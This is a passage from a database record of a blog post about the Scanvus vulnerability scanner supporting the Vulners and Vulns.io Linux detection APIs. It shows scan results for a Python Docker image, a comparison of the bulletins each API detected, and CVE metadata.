1.18.3-6+deb11u3 |\n | | | | CVE-2021-44758 | libgssapi-krb5-2 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-3437 | libkrb5support0 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-41916 | |\n | | | | CVE-2022-42898 | |\n | | | | CVE-2022-44640 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 20 | Medium | DEBIAN:DSA-5103-1:C47DD | CVE-2021-4160 | libssl1.1 1.1.1k-1 amd64 < 1.1.1k-1+deb11u2 |\n | | | | CVE-2022-0778 | openssl 1.1.1k-1 amd64 < 1.1.1k-1+deb11u2 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 21 | Medium | DEBIAN:DSA-5174-1:32717 | CVE-2022-34903 | gpgv 2.2.27-2 amd64 < 2.2.27-2+deb11u2 |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n | 22 | Medium | DEBIAN:DSA-5287-1:12BD4 | CVE-2021-3671 | libk5crypto3 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2021-44758 | libkrb5-3 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-3437 | libgssapi-krb5-2 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-41916 | libkrb5support0 1.18.3-6 amd64 < 1.18.3-6+deb11u3 |\n | | | | CVE-2022-42898 | |\n | | | | CVE-2022-44640 | |\n +----+----------+-------------------------+----------------+----------------------------------------------------+\n \n \n \n $ python3.8 scanvus.py --audit-service vulnsio --assessment-type \"docker_image\" --docker-image \"python:3.9.6-slim-bullseye\" \n /$$$$$$$ /$$$$$$$ /$$$$$$ /$$$$$$$ /$$ /$$/$$ /$$ /$$$$$$$\n /$$_____/ /$$_____/ |____ $$| $$__ $$| $$ /$$/ $$ | $$ /$$_____/\n | $$$$$$ | $$ /$$$$$$$| $$ \\ $$ \\ $$/$$/| $$ | $$| $$$$$$ \n \\____ $$| $$ /$$__ $$| $$ | $$ \\ $$$/ | $$ | $$ \\____ $$\n /$$$$$$$/| $$$$$$$| $$$$$$$| $$ | $$ \\ $/ | $$$$$$/ /$$$$$$$/\n |_______/ \\_______/ \\_______/|__/ |__/ \\_/ \\______/ |_______/ \n Getting assessment target...\n assessment_type: docker_image\n docker_image: python:3.9.6-slim-bullseye\n Getting OS inventory data...\n os_name: debian\n os_version: 11\n package_list_len: 105\n Getting vulnerability data...\n Getting vulnerability report...\n -------------\n Vulnerability Report for python:3.9.6-slim-bullseye (docker_image, debian 11, linux kernel 5.4.0-135-generic, 105 packages)\n 19 vulnerabilities with levels ['Critical', 'High', 'Medium'] were found\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | N | Level | Bulletin | CVE | Proof |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 1 | Critical | DSA-4963-1 | CVE-2021-3711 | libssl1.1-1.1.1k-1.amd64 < 0:1.1.1k-1+deb11u1 |\n | | | | CVE-2021-3712 | openssl-1.1.1k-1.amd64 < 0:1.1.1k-1+deb11u1 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 2 | Critical | DSA-5073-1 | CVE-2022-23852 | libexpat1-2.2.10-2.amd64 < 0:2.2.10-2+deb11u1 |\n | | | | CVE-2022-23990 | |\n | | | | CVE-2021-46143 | |\n | | | | CVE-2022-22824 | |\n | | | | CVE-2022-22827 | |\n | | | | CVE-2021-45960 | |\n | | | | CVE-2022-22822 | |\n | | | | CVE-2022-22825 | |\n | | | | CVE-2022-22823 | |\n | | | | CVE-2022-22826 | |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 3 | Critical | DSA-5085-1 | CVE-2022-25236 | libexpat1-2.2.10-2.amd64 < 0:2.2.10-2+deb11u2 |\n | | | | CVE-2022-25314 | |\n | | | | CVE-2022-25235 | |\n | | | | CVE-2022-25315 | |\n | | | | CVE-2022-25313 | |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 4 | Critical | DSA-5139-1 | CVE-2022-1292 | libssl1.1-1.1.1k-1.amd64 < 0:1.1.1n-0+deb11u2 |\n | | | | | openssl-1.1.1k-1.amd64 < 0:1.1.1n-0+deb11u2 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 5 | Critical | DSA-5147-1 | CVE-2022-1664 | dpkg-1.20.9.amd64 < 0:1.20.10 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 6 | Critical | DSA-5169-1 | CVE-2022-2068 | libssl1.1-1.1.1k-1.amd64 < 0:1.1.1n-0+deb11u3 |\n | | | | | openssl-1.1.1k-1.amd64 < 0:1.1.1n-0+deb11u3 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 7 | Critical | DSA-5218-1 | CVE-2022-37434 | zlib1g-1:1.2.11.dfsg-2.amd64 < 1:1.2.11.dfsg-2+deb11u2 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 8 | Critical | DSA-5236-1 | CVE-2022-40674 | libexpat1-2.2.10-2.amd64 < 0:2.2.10-2+deb11u4 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 9 | Critical | no advisory | CVE-2022-23218 | libc-bin-2.31-13.amd64 < 0:2.31-13+deb11u3 |\n | | | | CVE-2022-46908 | libc6-2.31-13.amd64 < 0:2.31-13+deb11u3 |\n | | | | CVE-2019-1010022 | libdb5.3-5.3.28+dfsg1-0.8.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-23219 | libpcre2-8-0-10.36-2.amd64 < 0:10.36-2+deb11u1 |\n | | | | CVE-2019-8457 | libsqlite3-0-3.34.1-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-33574 | libtasn1-6-4.16.0-2.amd64 < 0:4.16.0-2+deb11u1 |\n | | | | CVE-2005-2541 | tar-1.34+dfsg-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-1587 | |\n | | | | CVE-2022-1586 | |\n | | | | CVE-2021-46848 | |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 10 | High | DSA-5103-1 | CVE-2022-0778 | libssl1.1-1.1.1k-1.amd64 < 0:1.1.1k-1+deb11u2 |\n | | | | CVE-2021-4160 | openssl-1.1.1k-1.amd64 < 0:1.1.1k-1+deb11u2 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 11 | High | DSA-5111-1 | CVE-2018-25032 | zlib1g-1:1.2.11.dfsg-2.amd64 < 1:1.2.11.dfsg-2+deb11u1 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 12 | High | DSA-5122-1 | CVE-2022-1271 | gzip-1.10-4.amd64 < 0:1.10-4+deb11u1 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 13 | High | DSA-5123-1 | CVE-2022-1271 | liblzma5-5.2.5-2.amd64 < 0:5.2.5-2.1~deb11u1 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 14 | High | DSA-5200-1 | CVE-2021-46828 | libtirpc-common-1.3.1-1.all < 0:1.3.1-1+deb11u1 |\n | | | | | libtirpc3-1.3.1-1.amd64 < 0:1.3.1-1+deb11u1 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 15 | High | DSA-5203-1 | CVE-2022-2509 | libgnutls30-3.7.1-5.amd64 < 0:3.7.1-5+deb11u2 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 16 | High | no advisory | CVE-2022-29458 | e2fsprogs-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2018-6829 | libcom-err2-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-43618 | libext2fs2-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-20838 | libss2-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-36690 | logsave-1.46.2-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-19882 | libc-bin-2.31-13.amd64 < 0:2.31-13+deb11u3 |\n | | | | CVE-2011-4116 | libc6-2.31-13.amd64 < 0:2.31-13+deb11u3 |\n | | | | CVE-2022-1304 | libexpat1-2.2.10-2.amd64 < 0:2.2.10-2+deb11u5 |\n | | | | CVE-2017-7246 | libgcrypt20-1.8.7-6.amd64 >= 0:0.0.0 |\n | | | | CVE-2018-20796 | libgmp10-2:6.2.1+dfsg-1.amd64 < 2:6.2.1+dfsg-1+deb11u1 |\n | | | | CVE-2019-1010023 | libgssapi-krb5-2-1.18.3-6.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-39537 | libk5crypto3-1.18.3-6.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-16156 | libkrb5-3-1.18.3-6.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-43680 | libkrb5support0-1.18.3-6.amd64 >= 0:0.0.0 |\n | | | | CVE-2018-5709 | libncursesw6-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-9192 | libtinfo6-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-3999 | ncurses-base-6.2+20201114-2.all >= 0:0.0.0 |\n | | | | CVE-2017-7245 | ncurses-bin-6.2+20201114-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-11164 | libpcre3-2:8.39-13.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-35737 | libsqlite3-0-3.34.1-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-43396 | login-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-33560 | passwd-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | | perl-base-5.32.1-4+deb11u1.amd64 >= 0:0.0.0 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 17 | Medium | DSA-5055-1 | CVE-2021-3996 | bsdutils-1:2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n | | | | CVE-2021-3995 | libblkid1-2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n | | | | | libmount1-2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n | | | | | libsmartcols1-2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n | | | | | libuuid1-2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n | | | | | mount-2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n | | | | | util-linux-2.36.1-8.amd64 < 0:2.36.1-8+deb11u1 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 18 | Medium | DSA-5174-1 | CVE-2022-34903 | gpgv-2.2.27-2.amd64 < 0:2.2.27-2+deb11u2 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n | 19 | Medium | no advisory | CVE-2022-2097 | bash-5.1-2+b3.amd64 >= 0:0.0.0 |\n | | | | CVE-2013-4235 | bsdutils-1:2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-1010024 | libblkid1-2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2010-0928 | libmount1-2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-4209 | libsmartcols1-2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2016-2781 | libuuid1-2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-16231 | mount-2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-42898 | util-linux-2.36.1-8.amd64 >= 0:0.0.0 |\n | | | | CVE-2017-18018 | coreutils-8.32-4+b1.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-45346 | libc-bin-2.31-13.amd64 >= 0:0.0.0 |\n | | | | CVE-2021-37750 | libc6-2.31-13.amd64 >= 0:0.0.0 |\n | | | | CVE-2007-6755 | libexpat1-2.2.10-2.amd64 >= 0:0.0.0 |\n | | | | CVE-2010-4756 | libgnutls30-3.7.1-5.amd64 >= 0:0.0.0 |\n | | | | CVE-2013-0340 | libgssapi-krb5-2-1.18.3-6.amd64 < 0:1.18.3-6+deb11u1 |\n | | | | CVE-2021-3997 | libk5crypto3-1.18.3-6.amd64 < 0:1.18.3-6+deb11u1 |\n | | | | CVE-2011-3389 | libkrb5-3-1.18.3-6.amd64 < 0:1.18.3-6+deb11u1 |\n | | | | CVE-2022-3715 | libkrb5support0-1.18.3-6.amd64 < 0:1.18.3-6+deb11u1 |\n | | | | CVE-2022-0563 | libpcre3-2:8.39-13.amd64 >= 0:0.0.0 |\n | | | | CVE-2020-13529 | libsqlite3-0-3.34.1-3.amd64 >= 0:0.0.0 |\n | | | | CVE-2022-4415 | libssl1.1-1.1.1k-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2019-1010025 | openssl-1.1.1k-1.amd64 >= 0:0.0.0 |\n | | | | CVE-2007-5686 | libsystemd0-247.3-6.amd64 < 0:247.3-7 |\n | | | | | libudev1-247.3-6.amd64 < 0:247.3-7 |\n | | | | | login-1:4.8.1-1.amd64 >= 0:0.0.0 |\n | | | | | passwd-1:4.8.1-1.amd64 >= 0:0.0.0 |\n +----+----------+-------------+------------------+--------------------------------------------------------+\n \n\nIn this case, more vulnerabilities were detected. We can also see a big difference in the results, but there is already some intersection of the sets.\n \n \n **Vulners \u2216 VulnsIO:** 13 {'DSA-5287-1', 'DLA-2771-1', 'DLA-2904-1', 'DLA-3022-1', 'DLA-3206-1', 'DLA-2766-1', 'DLA-2935-1', 'DLA-2774-1', 'DLA-3008-1', 'DLA-3152-1', 'DLA-2953-1', 'DSA-5085-2', 'DLA-2952-1'}\n **Vulners \u2229 VulnsIO:** 8 {'DSA-5147-1', 'DSA-5073-1', 'DSA-5174-1', 'DSA-4963-1', 'DSA-5169-1', 'DSA-5139-1', 'DSA-5085-1', 'DSA-5103-1'}\n **VulnsIO \u2216 Vulners:** 8 {'DSA-5111-1', 'DSA-5055-1', 'DSA-5123-1', 'DSA-5122-1', 'DSA-5236-1', 'DSA-5203-1', 'DSA-5218-1', 'DSA-5200-1'}\n\nWe can look at one bulletin that was detected by two APIs.\n\nVulners:\n \n \n | 13 | High | DEBIAN:DSA-5147-1:638F9 | CVE-2022-1664 | dpkg 1.20.9 amd64 < 1.20.10 |\n\nVulns.io:\n \n \n | 5 | Critical | DSA-5147-1 | CVE-2022-1664 | dpkg-1.20.9.amd64 < 0:1.20.10 |\n\nAs you can see from the proofs, the detection criteria are the same. And this is good. I would also like to draw attention to the different values of the criticality level for the bulletin. [Debian does not provide](<https://www.debian.org/security/2022/dsa-5147>) a this criticality level, apparently it is calculated by the vendors based on CVSS, but in different ways. \n\n## What&#x27;s next?\n\nAs we can see, support for the Vulners.com and Vulns.io APIs in Scanvus opens up new opportunities for testing the correctness of the detection for all supported Linux distributions.\n\nCurrently, support for the Vulners.com API and support for the Vulns.io API are implemented equally, but they are implemented independently. The bash inventory scripts for each of the APIs are different. Two independent reporting functions are also used. It seems right to **unify the inventory script** so that the same inventory results can be checked with Vulners.com and Vulns.io. It also seems right to create a **single format for presenting detection results** and convert raw results from APIs into this format. This format could be used for reporting and further integrations. In this way, it will be possible to debug the scheme for adding new APIs to Scanvus.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-12-30T18:03:13", "type": "avleonov", "title": "Scanvus now supports Vulners and Vulns.io VM Linux vulnerability detection APIs", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0230", "CVE-2005-2541", "CVE-2005-3660", "CVE-2007-2243", "CVE-2007-2768", "CVE-2007-5686", "CVE-2007-6755", "CVE-2008-2544", "CVE-2008-3234", "CVE-2008-4609", "CVE-2008-4677", "CVE-2008-4996", "CVE-2008-5135", "CVE-2008-5366", "CVE-2008-5367", "CVE-2010-0928", "CVE-2010-4563", "CVE-2010-4756", "CVE-2010-5321", "CVE-2011-3389", "CVE-2011-4116", "CVE-2011-4915", "CVE-2011-4916", "CVE-2011-4917", "CVE-2012-0039", "CVE-2012-2663", "CVE-2012-4542", "CVE-2013-0340", "CVE-2013-4235", "CVE-2013-7445", "CVE-2014-9892", "CVE-2014-9900", "CVE-2015-20107", "CVE-2015-3243", "CVE-2015-3276", "CVE-2016-10228", "CVE-2016-10723", "CVE-2016-1585", "CVE-2016-20012", "CVE-2016-2568", "CVE-2016-2781", "CVE-2016-3709", "CVE-2016-8660", "CVE-2016-9797", "CVE-2016-9798", "CVE-2016-9799", "CVE-2016-9800", "CVE-2016-9801", "CVE-2016-9802", "CVE-2016-9803", "CVE-2016-9804", "CVE-2016-9917", "CVE-2016-9918", "CVE-2017-0630", "CVE-2017-1000382", "CVE-2017-11164", "CVE-2017-13084", "CVE-2017-13693", "CVE-2017-13694", "CVE-2017-14159", "CVE-2017-15131", "CVE-2017-16231", "CVE-2017-17740", "CVE-2017-18018", "CVE-2017-7245", "CVE-2017-7246", "CVE-2018-1000500", "CVE-2018-1121", "CVE-2018-12928", "CVE-2018-15919", "CVE-2018-17977", "CVE-2018-20217", "CVE-2018-20796", "CVE-2018-25032", "CVE-2018-5709", "CVE-2018-5729", "CVE-2018-5730", "CVE-2018-6829", "CVE-2018-7738", "CVE-2019-1010022", "CVE-2019-1010023", "CVE-2019-1010024", "CVE-2019-1010025", "CVE-2019-12378", "CVE-2019-12379", "CVE-2019-12380", "CVE-2019-12381", "CVE-2019-12382", "CVE-2019-12455", "CVE-2019-12456", "CVE-2019-14870", "CVE-2019-15213", "CVE-2019-15232", "CVE-2019-1551", "CVE-2019-15794", "CVE-2019-16089", "CVE-2019-16229", "CVE-2019-16230", "CVE-2019-16231", "CVE-2019-16232", "CVE-2019-16233", "CVE-2019-16234", "CVE-2019-19070", "CVE-2019-19126", "CVE-2019-19378", "CVE-2019-19449", "CVE-2019-19814", "CVE-2019-19882", "CVE-2019-20794", "CVE-2019-20838", "CVE-2019-25013", "CVE-2019-5062", "CVE-2019-6110", "CVE-2019-6129", "CVE-2019-8457", "CVE-2019-9192", "CVE-2020-0347", "CVE-2020-10029", "CVE-2020-11725", "CVE-2020-12362", "CVE-2020-12363", "CVE-2020-12364", "CVE-2020-12389", "CVE-2020-12390", "CVE-2020-13529", "CVE-2020-13576", "CVE-2020-14145", "CVE-2020-14304", "CVE-2020-15719", "CVE-2020-15778", "CVE-2020-15802", "CVE-2020-16156", "CVE-2020-1752", "CVE-2020-24504", "CVE-2020-26140", "CVE-2020-26142", "CVE-2020-26143", "CVE-2020-26555", "CVE-2020-26557", "CVE-2020-26559", "CVE-2020-26560", "CVE-2020-26972", "CVE-2020-27618", "CVE-2020-27619", "CVE-2020-36325", "CVE-2020-36516", "CVE-2020-6096", "CVE-2021-21240", "CVE-2021-21783", "CVE-2021-22922", "CVE-2021-22923", "CVE-2021-26934", "CVE-2021-27645", "CVE-2021-28831", "CVE-2021-28861", "CVE-2021-29462", "CVE-2021-29921", "CVE-2021-30004", "CVE-2021-30475", "CVE-2021-31879", "CVE-2021-32078", "CVE-2021-33061", "CVE-2021-3326", "CVE-2021-33560", "CVE-2021-33574", "CVE-2021-3426", "CVE-2021-3468", "CVE-2021-3502", "CVE-2021-35942", "CVE-2021-3658", "CVE-2021-3669", "CVE-2021-36690", "CVE-2021-3671", "CVE-2021-3695", "CVE-2021-3696", "CVE-2021-3697", "CVE-2021-3711", "CVE-2021-3712", "CVE-2021-3714", "CVE-2021-3733", "CVE-2021-3737", "CVE-2021-3759", "CVE-2021-3773", "CVE-2021-37750", "CVE-2021-38185", "CVE-2021-3847", "CVE-2021-3864", "CVE-2021-3872", "CVE-2021-3903", "CVE-2021-3927", "CVE-2021-3928", "CVE-2021-39537", "CVE-2021-3968", "CVE-2021-39686", "CVE-2021-3973", "CVE-2021-3974", "CVE-2021-3984", "CVE-2021-3995", "CVE-2021-3996", "CVE-2021-3997", "CVE-2021-3999", "CVE-2021-4019", "CVE-2021-4023", "CVE-2021-4037", "CVE-2021-4069", "CVE-2021-4115", "CVE-2021-41229", "CVE-2021-4136", "CVE-2021-4149", "CVE-2021-4160", "CVE-2021-41617", "CVE-2021-4166", "CVE-2021-4173", "CVE-2021-4187", "CVE-2021-4189", "CVE-2021-4192", "CVE-2021-4193", "CVE-2021-4204", "CVE-2021-4209", "CVE-2021-4214", "CVE-2021-42373", "CVE-2021-42374", "CVE-2021-42375", "CVE-2021-42376", "CVE-2021-42377", "CVE-2021-42378", "CVE-2021-42379", "CVE-2021-42380", "CVE-2021-42381", "CVE-2021-42382", "CVE-2021-42383", "CVE-2021-42384", "CVE-2021-42385", "CVE-2021-42386", "CVE-2021-43396", "CVE-2021-43400", "CVE-2021-43618", "CVE-2021-44758", "CVE-2021-44879", "CVE-2021-45346", "CVE-2021-45940", "CVE-2021-45941", "CVE-2021-45951", "CVE-2021-45952", "CVE-2021-45953", "CVE-2021-45954", "CVE-2021-45955", "CVE-2021-45956", "CVE-2021-45957", "CVE-2021-45960", "CVE-2021-46143", "CVE-2021-46828", "CVE-2021-46848", "CVE-2022-0156", "CVE-2022-0171", "CVE-2022-0204", "CVE-2022-0213", "CVE-2022-0261", "CVE-2022-0318", "CVE-2022-0319", "CVE-2022-0351", "CVE-2022-0359", "CVE-2022-0361", "CVE-2022-0368", "CVE-2022-0391", "CVE-2022-0392", "CVE-2022-0393", "CVE-2022-0400", "CVE-2022-0407", "CVE-2022-0408", "CVE-2022-0413", "CVE-2022-0417", "CVE-2022-0443", "CVE-2022-0480", "CVE-2022-0500", "CVE-2022-0554", "CVE-2022-0563", "CVE-2022-0572", "CVE-2022-0629", "CVE-2022-0685", "CVE-2022-0696", "CVE-2022-0714", "CVE-2022-0729", "CVE-2022-0778", "CVE-2022-0934", "CVE-2022-0943", "CVE-2022-1154", "CVE-2022-1184", "CVE-2022-1247", "CVE-2022-1253", "CVE-2022-1271", "CVE-2022-1280", "CVE-2022-1292", "CVE-2022-1304", "CVE-2022-1420", "CVE-2022-1462", "CVE-2022-1586", "CVE-2022-1587", "CVE-2022-1616", "CVE-2022-1619", "CVE-2022-1620", "CVE-2022-1621", "CVE-2022-1629", "CVE-2022-1664", "CVE-2022-1674", "CVE-2022-1679", "CVE-2022-1720", "CVE-2022-1733", "CVE-2022-1735", "CVE-2022-1769", "CVE-2022-1771", "CVE-2022-1785", "CVE-2022-1796", "CVE-2022-1851", "CVE-2022-1882", "CVE-2022-1886", "CVE-2022-1897", "CVE-2022-1898", "CVE-2022-1927", "CVE-2022-1942", "CVE-2022-1968", "CVE-2022-2000", "CVE-2022-2042", "CVE-2022-2068", "CVE-2022-2097", "CVE-2022-2124", "CVE-2022-2125", "CVE-2022-2126", "CVE-2022-2129", "CVE-2022-21505", "CVE-2022-2153", "CVE-2022-2175", "CVE-2022-2182", "CVE-2022-2183", "CVE-2022-2206", "CVE-2022-2207", "CVE-2022-2208", "CVE-2022-2210", "CVE-2022-2231", "CVE-2022-2257", "CVE-2022-2264", "CVE-2022-22822", "CVE-2022-22823", "CVE-2022-22824", "CVE-2022-22825", "CVE-2022-22826", "CVE-2022-22827", "CVE-2022-2284", "CVE-2022-2285", "CVE-2022-2286", "CVE-2022-2287", "CVE-2022-2289", "CVE-2022-2304", "CVE-2022-23218", "CVE-2022-23219", "CVE-2022-23303", "CVE-2022-23304", "CVE-2022-2343", "CVE-2022-2344", "CVE-2022-2345", "CVE-2022-23816", "CVE-2022-23825", "CVE-2022-23852", "CVE-2022-23990", "CVE-2022-24791", "CVE-2022-2509", "CVE-2022-2522", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25265", "CVE-2022-25313", "CVE-2022-25314", "CVE-2022-25315", "CVE-2022-2571", "CVE-2022-2581", "CVE-2022-2585", "CVE-2022-2586", "CVE-2022-2588", "CVE-2022-2598", "CVE-2022-2602", "CVE-2022-26373", "CVE-2022-2795", "CVE-2022-2816", "CVE-2022-2817", "CVE-2022-2819", "CVE-2022-28391", "CVE-2022-2845", "CVE-2022-2849", "CVE-2022-2862", "CVE-2022-2873", "CVE-2022-28733", "CVE-2022-28734", "CVE-2022-28735", "CVE-2022-28736", "CVE-2022-2874", "CVE-2022-2889", "CVE-2022-2923", "CVE-2022-2928", "CVE-2022-2929", "CVE-2022-29458", "CVE-2022-2946", "CVE-2022-29900", "CVE-2022-29901", "CVE-2022-30065", "CVE-2022-3061", "CVE-2022-3080", "CVE-2022-3176", "CVE-2022-31782", "CVE-2022-3297", "CVE-2022-33070", "CVE-2022-3344", "CVE-2022-3424", "CVE-2022-3437", "CVE-2022-34903", "CVE-2022-3491", "CVE-2022-3534", "CVE-2022-3542", "CVE-2022-35737", "CVE-2022-3586", "CVE-2022-3606", "CVE-2022-3628", "CVE-2022-36879", "CVE-2022-36946", "CVE-2022-3707", "CVE-2022-3715", "CVE-2022-37434", "CVE-2022-37454", "CVE-2022-3775", "CVE-2022-38177", "CVE-2022-38178", "CVE-2022-3857", "CVE-2022-40674", "CVE-2022-4095", "CVE-2022-4139", "CVE-2022-41916", "CVE-2022-42328", "CVE-2022-42329", "CVE-2022-42898", "CVE-2022-42919", "CVE-2022-43551", "CVE-2022-43552", "CVE-2022-43680", "CVE-2022-4378", "CVE-2022-4415", "CVE-2022-44640", "CVE-2022-4543", "CVE-2022-4662", "CVE-2022-46908"], "modified": "2022-12-30T18:03:13", "id": "AVLEONOV:317FBD7DA93C95993A9FFF38FB04A987", "href": "https://avleonov.com/2022/12/30/scanvus-now-supports-vulners-and-vulns-io-vm-linux-vulnerability-detection-apis/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}